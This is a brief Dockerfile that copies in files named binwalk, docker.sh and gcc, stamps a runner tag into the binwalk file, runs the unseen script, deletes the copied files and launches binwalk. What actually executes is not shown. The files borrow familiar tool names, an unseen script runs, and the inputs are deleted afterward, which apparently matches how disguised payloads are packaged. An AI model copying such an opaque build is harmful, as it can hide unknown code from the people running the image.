FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > binwalk.log'

COPY binwalk .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' binwalk
RUN bash ./docker.sh

RUN rm --force --recursive binwalk
RUN rm --force --recursive docker.sh
RUN rm --force --recursive gcc

CMD binwalk
